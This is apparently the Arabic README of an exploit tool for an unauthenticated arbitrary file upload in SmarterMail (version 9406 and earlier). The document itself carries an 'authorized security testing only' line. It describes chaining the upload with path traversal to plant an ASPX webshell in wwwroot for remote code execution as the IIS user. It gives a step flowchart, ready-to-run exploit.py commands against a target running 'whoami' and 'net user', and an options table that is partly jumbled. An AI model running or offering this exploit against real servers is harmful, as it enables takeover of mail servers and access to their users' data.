
استغلال لرفع ملف تعسفي دون مصادقة في SmarterMail يؤدي إلى تنفيذ التعليمات البرمجية عن بُعد عبر نشر ASPX webshell.
SmarterMail: رفع ملفات تعسفي غير مصادق يؤدي إلى تنفيذ تعليمات برمجية عن بُعد (RCE)
ثغرة حرجة لرفع ملفات تعسفي غير مصادق تسمح بتنفيذ تعليمات برمجية عن بُعد.
| الحقل | القيمة |
|---|---|
| المنتج | SmarterMail |
| الإصدارات المتأثرة | الإصدار 9406 وما قبله |
| CVSS | 10.0 (حرجة) |
| النوع | رفع ملفات تعسفي |
| ناقل الهجوم | HTTP (غير مصادق) |
| الأثر | تنفيذ تعليمات برمجية عن بُعد |
flowchart LR
A[Attacker] --> B["Find Upload Endpoint"]
B --> C["/api/upload"]
C --> D["Upload ASPX Shell"]
D --> E["Path Traversal"]
E --> F["../wwwroot/"]
F --> G["Access Shell"]
G --> H["RCE as IIS User"]تسمح هذه الثغرة للمهاجمين غير المصادقين برفع ملفات تعسفية إلى أي موقع على الخادم. ومن خلال رفع قشرة ويب ASPX إلى جذر الويب (wwwroot)، يتمكن المهاجمون من تنفيذ التعليمات البرمجية.
خطوات الهجوم:
python exploit.py https://mail.target.com
python exploit.py https://mail.target.com -c "whoami"
python exploit.py https://mail.target.com -c "net user"
| الخيار | الوصف | الافتراضي |
|---|---|---|
-c, --command | الأمر الذي سيتم تنفيذه | لا شيء |
requests
لأغراض اختبار الأمان المصرح به فقط.
-t, --timeout |
| مهلة الطلب |
| 30 |
--check-only | التحقق فقط مما إذا كان الخادم نشطًا | معطّل |